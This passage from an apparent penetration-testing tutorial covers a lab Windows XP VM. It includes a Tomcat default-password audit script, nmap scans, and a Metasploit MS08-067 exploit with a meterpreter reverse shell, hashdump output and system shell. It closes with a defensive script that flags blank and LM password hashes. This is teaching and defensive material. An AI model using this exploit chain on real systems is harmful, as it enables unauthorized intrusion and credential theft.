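DEFAULT_PASSWORDS: Set[str] = {"", "admin", "manager", "role1", "root", "tomcat", "s3cret"}

# Roles that grant deploy or administration rights (Tomcat 5.5 names plus the
# split roles used by later Tomcat versions).
PRIVILEGED_ROLES: Set[str] = {
    "manager", "admin",
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}


class Finding(NamedTuple):
    severity: str
    username: str
    detail: str


def audit_tomcat_users(xml_text: str) -> List[Finding]:
    """Return one finding per risky <user> element, in file order."""
    findings: List[Finding] = []
    root = ET.fromstring(xml_text)
    for user in root.iter("user"):
        name = user.get("username", "")
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if password in DEFAULT_PASSWORDS or password == name:
            # A default password on a manager/admin account is exactly what let the
            # tutorial deploy a .war; on an unprivileged account it is still a foothold.
            severity = "HIGH" if privileged else "MEDIUM"
            findings.append(Finding(severity, name,
                                    f"default or guessable password; roles={sorted(roles)}"))
        elif privileged:
            # Not a defect by itself, but every manager-capable account deserves review.
            findings.append(Finding("INFO", name,
                                    f"holds privileged roles {sorted(privileged)}; confirm it is needed"))
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"[{f.severity}] {f.username}: {f.detail}")
```

On the sample this reports the tomcat account as HIGH (default password and manager/admin roles), the two other default users as MEDIUM, and the deployer account as INFO. The fix the audit points at is the same regardless of version: remove or rename the default users, give every remaining manager account a unique strong password, and, if the manager application is not needed on that instance, do not deploy it at all.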

Gathering Information – Windows XP Machine

We'll begin by trying the same basic scan as before against our VM (Windows XP) machine at 192.168.56.103.

[c]
root@wizard32:~# nmap -p- 192.168.56.103

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds
[/c]

Looking at the results, we can see that several ports are open. So let's focus on port 445. Using nmap once more, we'll add a couple of parameters to discover a little more about this specific port.

[c]
root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: windowsx-c7b000
|   NetBIOS computer name: WINDOWSX-C7B000
|   Workgroup: WORKGROUP
|_  System time: 2013-06-18 04:36:59 UTC+3

TRACEROUTE
HOP RTT      ADDRESS
1   0.55 ms  192.168.56.103

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
[/c]

-A: Aggressive scan; enables many options at once, such as version detection and script scanning. Use with caution.

-T (0-5): Timing template; determines how aggressive (fast) the scan is.

-Pn: Skip host discovery; no ping probe is sent before the port scan.

-p: Only scan the specified ports.

Identify network services – Exploit Vulnerable Backdoors

Reviewing the output closely, we can see that port 445/tcp runs an SMB server. We can identify the OS environment the SMB server runs on by typing:

[c]
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run

[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, the SMB server runs on Windows XP SP2. So once more, using Metasploit, we'll try to exploit it.

[c]
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWSX-C7B000
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 WINDOWSX-C7B000
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 2 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          windowsxp
Registered Organization:
Product ID:                76487-640-8365391-23703
Original Install Date:     6/10/2013, 1:02:40 PM
System Up Time:            0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version:              VBOX   - 1
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use:    39 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: AMD PCNET Family PCI Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.56.103
[/c]

Conclusion

There are many ways to enumerate and exploit vulnerable web applications or services. This tutorial describes the basic things we can do to gather important information and exploit the best-known vulnerable services in a couple of ways. The safest approach is to try every parameter in a virtual environment before running any of the above examples against real servers, and to do so only with access authorized by the administrator.
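Looking back at the hashdump output from the Windows XP machine, the post-exploitation listing tells a defender two things the exploit itself did not: three accounts, including the built-in Administrator (RID 500), have the NT hash of an empty password, and three others still store an LM hash. The following script is an added example (not code from the tutorial) that reads pwdump-style lines and reports both conditions. The input is the tutorial's own hashdump output; the two hash constants are the well-known values of an empty LM and an empty NT password.

```python
"""Flag blank passwords and stored LM hashes in a pwdump-style listing.

Added example, not code from the original tutorial. The listing is the
tutorial's own meterpreter hashdump output for the Windows XP VM; the two
constants are the well-known hashes of an empty LM and an empty NT password.
"""
from typing import List, NamedTuple, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (also shown when LM storage is off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

# Copied from the hashdump output shown in the tutorial (format: user:rid:lm:nt:::).
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


class Finding(NamedTuple):
    account: str
    rid: int
    issue: str


def parse_hashdump(text: str) -> List[Tuple[str, int, str, str]]:
    """Split pwdump lines into (account, rid, lm_hash, nt_hash); skip malformed rows."""
    rows: List[Tuple[str, int, str, str]] = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows


def audit_hashdump(text: str) -> List[Finding]:
    """Report blank passwords and LM hash presence, one Finding per condition per account."""
    findings: List[Finding] = []
    for account, rid, lm, nt in parse_hashdump(text):
        if nt == EMPTY_NT:
            # RID 500 is the built-in Administrator; a blank password on it means the
            # most privileged local account has no credential at all.
            label = "blank password on built-in Administrator" if rid == 500 else "blank password"
            findings.append(Finding(account, rid, label))
        if lm != EMPTY_LM:
            # A real LM hash means the password is at most 14 characters and LM storage
            # is enabled; LM is case-insensitive and split into two 7-character halves,
            # so it falls to brute force quickly.
            findings.append(Finding(account, rid, "LM hash stored; disable LM hash storage"))
    return findings


if __name__ == "__main__":
    for f in audit_hashdump(HASHDUMP):
        print(f"{f.account} (RID {f.rid}): {f.issue}")
```

Two caveats when using this on real dumps: the pwdump format does not record whether an account is disabled (Guest and SUPPORT_388945a0 usually are), so correlate with account status before raising tickets, and an LM field equal to EMPTY_LM can mean either a blank password or that LM storage is simply off, which is why the script keys the blank-password check on the NT hash.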